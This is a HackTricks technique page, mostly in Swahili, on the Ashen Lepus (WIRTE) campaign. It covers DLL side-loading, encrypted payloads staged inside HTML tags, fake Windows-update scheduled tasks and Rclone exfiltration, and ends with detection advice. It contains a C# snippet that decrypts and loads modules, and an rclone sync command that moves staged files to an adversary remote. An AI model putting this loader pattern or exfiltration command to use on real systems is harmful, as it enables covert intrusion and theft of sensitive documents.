Advanced DLL Side-Loading With HTML-Embedded Payload Staging
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Muhtasari wa Mbinu
Ashen Lepus (aka WIRTE) alitumia muundo unaorudiwa unaochaina DLL sideloading, staged HTML payloads, na modular .NET backdoors ili kudumu ndani ya mitandao ya ubalozi ya Mashariki ya Kati. Mbinu hii inaweza kutumika tena na opereta yeyote kwa sababu inategemea:
- Archive-based social engineering: PDF zisizo hatari zinaelekeza walengwa kuvuta archive ya RAR kutoka tovuti ya kushiriki faili. Archive inajumuisha EXE ya msomaji wa nyaraka inayoonekana halali, DLL mbaya iliyojina kama maktaba ya kuaminika (e.g.,
netutils.dll,srvcli.dll,dwampi.dll,wtsapi32.dll), naDocument.pdfya kujiingiza. - DLL search order abuse: mteja anabonyeza mara mbili EXE, Windows inatafuta import ya DLL kutoka saraka ya sasa, na loader mbaya (AshenLoader) inatekelezwa ndani ya mchakato uliothibitishwa huku PDF ya kujiingiza ikifunguka ili kuepuka mashaka.
- Living-off-the-land staging: kila hatua inayofuata (AshenStager → AshenOrchestrator → modules) haiko kwenye diski hadi itakapohitajika, hutumwa kama blobs zilizofichwa zilizosasishwa na encryption ndani ya majibu ya HTML yasiyo hatari.
Multi-Stage Side-Loading Chain
- Decoy EXE → AshenLoader: EXE inafanya side-load AshenLoader, ambayo hufanya recon ya mwenyeji, inaiweka kwa AES-CTR, na inai-POST ndani ya parameter zinazorota kama
token=,id=,q=, auauth=kwenye njia zinazoonekana kama API (mfano/api/v2/account). - HTML extraction: C2 hutangaza tu hatua inayofuata wakati IP ya mteja inapotofautishwa hadi mkoa lengwa na
User-Agentinavyolingana na implant, ikikusudia kuwakataliwa sandboxes. Wakati ukaguzi unapopita, mwili wa HTTP una<headerp>...</headerp>blob yenye payload ya AshenStager iliyosimbwa kwa Base64/AES-CTR. - Second sideload: AshenStager inaendeshwa pamoja na binary halali nyingine inayoinport
wtsapi32.dll. Nakala mbaya iliyochanganywa ndani ya binary inachukua HTML zaidi, wakati huu ikikamua<article>...</article>ili kupata AshenOrchestrator. - AshenOrchestrator: controller modular wa .NET anayefasiri config ya JSON iliyofungwa kwa Base64. Vectors za config
tgnaauzinachanganishwa/kuwekwa hash kuwa key ya AES, ambayo inaunda ufunguo wa kusambazaxrk. Bytes zinazotokana hutumika kama key ya XOR kwa kila blob ya module inayopatikana baadaye. - Module delivery: kila module inaelezewa kupitia maoni ya HTML ambayo yanamwandisha parser kwa tag yoyote ile, kuvunja sheria za static zinazotafuta tu
<headerp>au<article>. Modules ni pamoja na persistence (PR*), uninstallers (UN*), reconnaissance (SN), screen capture (SCT), na file exploration (FE).
HTML Container Parsing Pattern
var tag = Regex.Match(html, "<!--\s*TAG:\s*<(.*?)>\s*-->").Groups[1].Value;
var base64 = Regex.Match(html, $"<{tag}>(.*?)</{tag}>", RegexOptions.Singleline).Groups[1].Value;
var aesBytes = AesCtrDecrypt(Convert.FromBase64String(base64), key, nonce);
var module = XorBytes(aesBytes, xorKey);
LoadModule(JsonDocument.Parse(Encoding.UTF8.GetString(module)));
Hata kama watetezi watazuia au kuondoa kipengele fulani, msimamizi anahitaji tu kubadilisha tag iliyotajwa katika maoni ya HTML ili kuendeleza utoaji.
Crypto & C2 Hardening
- AES-CTR everywhere: loaders za sasa zinaweka funguo za 256-bit pamoja na nonces (mfano
{9a 20 51 98 ...}) na kwa hiari zinaongeza tabaka la XOR kwa kutumia strings kamamsasn1.dllkabla/baada ya decryption. - Recon smuggling: data iliyoorodheshwa sasa inajumuisha listings za Program Files kutambua apps zenye thamani kubwa na daima imeencrypted kabla ya kuondoka kwenye host.
- URI churn: query parameters na REST paths zinazunguka kati ya campaigns (
/api/v1/account?token=→/api/v2/account?auth=), zikiharibu detections dhaifu. - Gated delivery: servers zimegeo-fenced na zinajibu implants halisi pekee. Clients wasioruhusiwa hupokea HTML isiyo ya kushtukiza.
Persistence & Execution Loop
AshenStager hunyunyizia scheduled tasks zinazojifanya kazi za matengenezo ya Windows na zinafanywa kupitia svchost.exe, kwa mfano:
C:\Windows\System32\Tasks\Windows\WindowsDefenderUpdate\Windows Defender UpdaterC:\Windows\System32\Tasks\Windows\WindowsServicesUpdate\Windows Services UpdaterC:\Windows\System32\Tasks\Automatic Windows Update
Kazi hizi zinarudisha kuanzishwa kwa mnyororo wa sideloading wakati wa boot au kwa vipindi, kuhakikisha AshenOrchestrator inaweza kuomba modules mpya bila kugusa disk tena.
Using Benign Sync Clients for Exfiltration
Wadhibiti huweka nyaraka za kidiplomasia ndani ya C:\Users\Public (zinazosomwa na wengi na zisizo za kushtuka) kupitia module maalumu, kisha hupakua binary halali ya Rclone ili kusawazisha saraka hiyo na hifadhi inayodhibitiwa na mwadui:
- Stage: nakili/ikusanye faili za lengo ndani ya
C:\Users\Public\{campaign}\. - Configure: tuma usanidi wa Rclone unaoonyesha kwenye endpoint ya HTTPS inayodhibitiwa na mwadui (mfano
api.technology-system[.]com). - Sync: endesha
rclone sync "C:\Users\Public\campaign" remote:ingest --transfers 4 --bwlimit 4M --quietili trafiki ionekane kama backups za kawaida za cloud.
Kwa kuwa Rclone inatumika sana kwa workflows za halali za backup, watetezi wanapaswa kuzingatia utekelezaji usio wa kawaida (binaries mpya, remotes zisizo za kawaida, au kusawazisha ghafla C:\Users\Public).
Detection Pivots
- Alert kuhusu signed processes ambazo ghafla zinapakia DLLs kutoka njia zinazoweza kuandikwa na watumiaji (Procmon filters +
Get-ProcessMitigation -Module), hasa wakati majina ya DLL yanashirikiana nanetutils,srvcli,dwampi, auwtsapi32. - Chunguza majibu ya HTTPS yenye shaka kwa large Base64 blobs embedded inside unusual tags au zilizo na ulinzi wa maoni
<!-- TAG: <xyz> -->. - Tafuta scheduled tasks zinazomfanya
svchost.exekuendeshwa na arguments zisizo za service au zinazorejea kwenye directories za dropper. - Fuata Rclone binaries zinazoibuka nje ya maeneo yanayosimamiwa na IT, faili mpya za
rclone.conf, au sync jobs zinazoleta kutoka saraka za staging kamaC:\Users\Public.
References
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
HackTricks

